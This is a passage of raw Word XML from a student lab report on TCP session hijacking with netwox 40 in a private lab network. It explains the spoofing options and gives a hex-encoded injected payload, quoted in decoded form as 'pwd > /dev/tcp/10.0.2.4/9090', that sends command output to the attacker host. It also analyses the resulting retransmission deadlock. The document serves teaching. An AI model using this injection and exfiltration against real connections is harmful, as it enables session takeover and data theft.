        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="073A6346" wp14:editId="48B94C32">
            <wp:extent cx="5673271" cy="3603951"/>
            <wp:effectExtent l="0" t="0" r="381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1802" cy="3615723"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC3619C" w14:textId="653E40AE" w:rsidR="004473B2" w:rsidRDefault="00424C3B" w:rsidP="00C550FB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 40 is a tool used to send fake packets on the network. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FE0771" w14:textId="3015900E" w:rsidR="00424C3B" w:rsidRDefault="002F420E" w:rsidP="00C550FB">
      <w:r w:rsidRPr="004473B2">
        <w:t>--ip4-dontfrag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = when the client receives the packet, if the packet is bigger than the maximum </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tramission</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> unit (MTU), it may fragment the packet. This command ensures that the packet does not get fragmented. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464446D2" w14:textId="6F68357D" w:rsidR="002F420E" w:rsidRDefault="002F420E" w:rsidP="00C550FB">
      <w:r w:rsidRPr="004473B2">
        <w:t>--ip4-ttl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 = this is a timer for the life of a packet or time to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>live.When</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the timer reaches 0 the packet is discarded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD8FD97" w14:textId="7E0580D1" w:rsidR="002F420E" w:rsidRDefault="002F420E" w:rsidP="00C550FB">
      <w:r w:rsidRPr="004473B2">
        <w:t>-ip4-protocol 6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = It is to specify what type of packet it is. </w:t>
      </w:r>
      <w:r w:rsidR="0075217A">
        <w:t>The 6 protocol indicated that this is a TCP packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342BDEB8" w14:textId="0AF1E9BA" w:rsidR="0075217A" w:rsidRDefault="0075217A" w:rsidP="00C550FB">
      <w:r w:rsidRPr="004473B2">
        <w:t>--ip4-src 10.0.2.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = The source IP of the packet is from </w:t>
      </w:r>
      <w:r w:rsidRPr="0075217A">
        <w:t>Client@10.0.2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68524933" w14:textId="1969779E" w:rsidR="0075217A" w:rsidRDefault="0075217A" w:rsidP="00C550FB">
      <w:r w:rsidRPr="004473B2">
        <w:t>--ip4-dst 10.0.2.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = the destination IP of the packet is </w:t>
      </w:r>
      <w:r w:rsidRPr="0075217A">
        <w:t>server@10.0.2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3145DC" w14:textId="74FB2985" w:rsidR="0075217A" w:rsidRDefault="0075217A" w:rsidP="00C550FB">
      <w:r w:rsidRPr="004473B2">
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004473B2">
        <w:t>tcp-seqnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004473B2">
        <w:t xml:space="preserve"> 2181164136</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = The sequence number as obtained from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6274CCD9" w14:textId="34CC3E1F" w:rsidR="0075217A" w:rsidRDefault="0075217A" w:rsidP="00C550FB">
      <w:r w:rsidRPr="004473B2">
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004473B2">
        <w:t>tcp-acknum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004473B2">
        <w:t xml:space="preserve"> 2282574859</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = The acknowledge number (or signature of the packet) as obtained from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A77EA35" w14:textId="6BA55DB4" w:rsidR="0075217A" w:rsidRDefault="0075217A" w:rsidP="00C550FB">
      <w:r w:rsidRPr="004473B2">
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004473B2">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004473B2">
        <w:t>-ack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = a flag in field in the TCP header, that indicates that this is a ACK packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4605CE65" w14:textId="5F6AFD6F" w:rsidR="005B4850" w:rsidRDefault="0075217A" w:rsidP="00C550FB">
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp-psh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = a flag </w:t>
      </w:r>
      <w:r w:rsidR="005B4850">
        <w:t xml:space="preserve">that tells the receiving host that the data should be pushed up to the receiving application immediately. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268965FD" w14:textId="57A052EA" w:rsidR="005B4850" w:rsidRDefault="005B4850" w:rsidP="00C550FB">
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-window 501 = the size of the TCP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> window that is communicated to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A82AF58" w14:textId="43DA0C3D" w:rsidR="005B4850" w:rsidRDefault="005B4850" w:rsidP="00C550FB">
      <w:r w:rsidRPr="004473B2">
        <w:lastRenderedPageBreak/>
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004473B2">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004473B2">
        <w:t>-data '0a707764203e202f6465762f7463702f31302e302e322e342f393039300a'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = the data that is sent in the packet, written in hex.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096C64BE" w14:textId="66ABBB88" w:rsidR="00424C3B" w:rsidRDefault="005B4850" w:rsidP="00C550FB">
      <w:r w:rsidRPr="004473B2">
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004473B2">
        <w:t>spoofip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004473B2">
        <w:t xml:space="preserve"> "best"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = alias for ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linkraw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’. Raw means to spoof at the IP4/IP6 level, and uses system IP stack. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB2B70F" w14:textId="77777777" w:rsidR="005B4850" w:rsidRDefault="005B4850" w:rsidP="00C550FB"/>
    <w:p w14:paraId="747712BD" w14:textId="4FAC1441" w:rsidR="00F91CF5" w:rsidRDefault="004473B2" w:rsidP="00C550FB">
      <w:r>
        <w:t xml:space="preserve">The attack is successful. </w:t>
      </w:r>
      <w:r w:rsidR="00424C3B">
        <w:t xml:space="preserve">Attacker@10.0.2.4 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> content in port 9090</w:t>
      </w:r>
      <w:r w:rsidR="00424C3B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F309AD" w14:textId="77777777" w:rsidR="004473B2" w:rsidRDefault="004473B2" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40327EEE" wp14:editId="4C70984A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="5943600" cy="939800"/>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939800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACDA4E0" w14:textId="77777777" w:rsidR="00586072" w:rsidRDefault="00586072" w:rsidP="004473B2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1380"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0589533F" w14:textId="77777777" w:rsidR="00586072" w:rsidRDefault="00586072" w:rsidP="004473B2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1380"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63ED3C93" w14:textId="77777777" w:rsidR="00586072" w:rsidRDefault="00586072" w:rsidP="004473B2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1380"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="071ED0E4" w14:textId="77777777" w:rsidR="00586072" w:rsidRDefault="00586072" w:rsidP="004473B2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1380"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="756A484D" w14:textId="77777777" w:rsidR="00586072" w:rsidRDefault="00586072" w:rsidP="004473B2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1380"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="322580D3" w14:textId="444064DD" w:rsidR="004473B2" w:rsidRDefault="004473B2" w:rsidP="004473B2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1380"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Check on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5301A9D1" w14:textId="1725EEED" w:rsidR="004473B2" w:rsidRDefault="004473B2" w:rsidP="004473B2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1380"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F5A3606" wp14:editId="54808C98">
            <wp:extent cx="5740720" cy="7085223"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>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1731" cy="7098813"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping" w:clear="all"/>
        <w:t xml:space="preserve">Evidence of successful attack. The </w:t>
      </w:r>
      <w:r w:rsidR="00424C3B">
        <w:t>data in the last packet shows “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00424C3B">
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00424C3B">
        <w:t xml:space="preserve"> &gt; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00424C3B">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00424C3B">
        <w:t>/10.0.2.4/9090\r\n”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBD94AD" w14:textId="77777777" w:rsidR="009B75DF" w:rsidRDefault="009B75DF" w:rsidP="00C550FB"/>
    <w:p w14:paraId="4D1E77C4" w14:textId="7DC4ADE0" w:rsidR="00C550FB" w:rsidRPr="006B1D6F" w:rsidRDefault="00C550FB" w:rsidP="00C550FB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. Show the abnormal </w:t>
      </w:r>
      <w:r w:rsidR="00026338" w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>behaviour</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> you observed through </w:t>
      </w:r>
      <w:r w:rsidR="00026338" w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> and explain the reason of this abnormal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>. (10 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E581C2" w14:textId="354CF925" w:rsidR="00C550FB" w:rsidRDefault="00B410C2" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19081CB6" wp14:editId="45883098">
            <wp:extent cx="6567054" cy="6784194"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26" name="Picture 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95094" cy="6813161"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FECA3E" w14:textId="1DA1A982" w:rsidR="00B410C2" w:rsidRDefault="00B410C2" w:rsidP="00C550FB"/>
    <w:p w14:paraId="5DF092CD" w14:textId="1F057D7A" w:rsidR="00B410C2" w:rsidRDefault="00B410C2" w:rsidP="00C550FB">
      <w:r>
        <w:t xml:space="preserve">Abnormal Behaviour: After the attack, we can see that there are many retransmission packet between </w:t>
      </w:r>
      <w:r w:rsidRPr="00B410C2">
        <w:t>client@10.0.2.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B410C2">
        <w:t>server@10.0.2.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> suspected as “retransmission”. This is because by injecting the data, the attacker messes up the sequence number and payload size between the client and server. When the server send a reply to our spoofed packet, it acknowledges the sequence number and the payload size created by attacker. However, the </w:t>
      </w:r>
      <w:r w:rsidR="00B64665">
        <w:t>client</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has not reached that particular sequence number yet, so it doesn’t send out an ACK. Without the ACK, the server believes that the pack is lost and it continues to retransmit the packet with the messed up sequence number but this is continuously getting dropped by the client. On the side of the client, it will keep sending the packet with the old sequence number (already used by attacker), the server sees it as duplicate data, and thereby drops the packet. This creates a deadlock between the server and client. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AFA401" w14:textId="14BD1CC0" w:rsidR="00C550FB" w:rsidRDefault="00C550FB" w:rsidP="00C550FB"/>
    <w:p w14:paraId="3604A9F2" w14:textId="77777777" w:rsidR="003103A8" w:rsidRDefault="003103A8" w:rsidP="00C550FB"/>
    <w:p w14:paraId="54337A80" w14:textId="0BCB8513" w:rsidR="00C550FB" w:rsidRPr="00586072" w:rsidRDefault="00C550FB" w:rsidP="00C550FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00757FAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve">Eliminate the abnormal packets using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00757FAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00757FAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool, explain your idea and your command, and describe the observed results (10 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BCF090" w14:textId="07D46305" w:rsidR="007042F2" w:rsidRDefault="007042F2" w:rsidP="00C550FB">
      <w:r>
        <w:t xml:space="preserve">The abnormal </w:t>
      </w:r>
      <w:r w:rsidR="00132BD0">
        <w:t>behaviour</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is seen in the reverse direction where the source is server and destination is client. This means that abnormal behaviour is caused by the server expecting an ACK back from the client. Attacker can eliminate the abnormal behaviour by sending out a packet with an ACK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E76A5D" w14:textId="3DE870CA" w:rsidR="001C3182" w:rsidRDefault="001C3182" w:rsidP="00C550FB"/>
    <w:p w14:paraId="0B1E0627" w14:textId="342FF9C0" w:rsidR="00757FAD" w:rsidRDefault="00757FAD" w:rsidP="00C550FB">
      <w:r>
        <w:t xml:space="preserve">(I worked on this problem on another day, so I had to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>redemo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> this). Here is the new demo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8D0D19" w14:textId="187927BA" w:rsidR="00757FAD" w:rsidRDefault="00757FAD" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BB766BB" wp14:editId="68A837FF">
            <wp:extent cx="6645910" cy="1696085"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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645910" cy="1696085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF5C83C" w14:textId="2FFE3B30" w:rsidR="00757FAD" w:rsidRDefault="00757FAD" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14C01B2A" wp14:editId="7DF4B630">
            <wp:extent cx="6645910" cy="1696085"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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645910" cy="1696085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47315BB5" w14:textId="573F859A" w:rsidR="00757FAD" w:rsidRDefault="00757FAD" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AF55590" wp14:editId="2C4EBB3E">
            <wp:extent cx="6645910" cy="39668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45910" cy="3966845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3DAAE8" w14:textId="77777777" w:rsidR="00757FAD" w:rsidRDefault="00757FAD" w:rsidP="00C550FB"/>
    <w:p w14:paraId="5204AE1C" w14:textId="77777777" w:rsidR="00290AB9" w:rsidRDefault="00290AB9" w:rsidP="00C550FB"/>
    <w:p w14:paraId="27A7368B" w14:textId="77777777" w:rsidR="00290AB9" w:rsidRDefault="00290AB9" w:rsidP="00C550FB"/>
    <w:p w14:paraId="52E74CB8" w14:textId="77777777" w:rsidR="00290AB9" w:rsidRDefault="00290AB9" w:rsidP="00C550FB"/>
    <w:p w14:paraId="08108DB0" w14:textId="77777777" w:rsidR="00290AB9" w:rsidRDefault="00290AB9" w:rsidP="00C550FB"/>
    <w:p w14:paraId="70BBA7D0" w14:textId="0E770BE8" w:rsidR="00757FAD" w:rsidRDefault="00757FAD" w:rsidP="00C550FB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Package is captured by attacker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207AA8F0" w14:textId="1DC75A04" w:rsidR="00757FAD" w:rsidRDefault="00757FAD" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03D5072D" wp14:editId="71A6BB97">
            <wp:extent cx="6645910" cy="4061460"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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4061460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB2008A" w14:textId="0D903A69" w:rsidR="00757FAD" w:rsidRDefault="00757FAD" w:rsidP="00C550FB"/>
    <w:p w14:paraId="711D91F4" w14:textId="75328E62" w:rsidR="00757FAD" w:rsidRDefault="00757FAD" w:rsidP="00C550FB">
      <w:r>
        <w:t>Attacker injects the command: \n\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8D3B9D" w14:textId="5DD67855" w:rsidR="00757FAD" w:rsidRDefault="00757FAD" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00FE56F1" wp14:editId="5902DC9E">
            <wp:extent cx="6645910" cy="466280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45910" cy="4662805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D3340B" w14:textId="45253631" w:rsidR="00757FAD" w:rsidRDefault="00757FAD" w:rsidP="00C550FB"/>
    <w:p w14:paraId="3F9CC394" w14:textId="39F073C6" w:rsidR="00757FAD" w:rsidRDefault="00757FAD" w:rsidP="00C550FB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">TCP Retransmission abnormal packets appear. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57A2F928" wp14:editId="72FFB664">
            <wp:extent cx="6645910" cy="3977005"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="52" name="Picture 5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977005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1751EA05" w14:textId="080268D0" w:rsidR="00757FAD" w:rsidRDefault="00757FAD" w:rsidP="00C550FB"/>
    <w:p w14:paraId="5F7B9833" w14:textId="0C29D526" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="00C550FB">
      <w:r>
        <w:t xml:space="preserve">Thus the summary so far is: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E31E10" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:r>
        <w:t>SYN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52050774" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4"/>
    <w:p w14:paraId="25FBDD76" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: 10.0.2.5, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6BB60F" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: 10.0.2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21342E26" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Port: 40308, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DB3355" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Port: 23, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194D2151" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:r>
        <w:t xml:space="preserve">Sequence number: 2125997702 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F03E74F" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:r>
        <w:t>Acknowledgment number: 4269703895</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CD9519" w14:textId="77777777" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4"/>
    <w:p w14:paraId="6066FBA0" w14:textId="1B75F33F" w:rsidR="007A14D4" w:rsidRDefault="007A14D4" w:rsidP="007A14D4">
      <w:r>
        <w:t>SYN ACK</w:t>
      </w:r>
      <w:r>
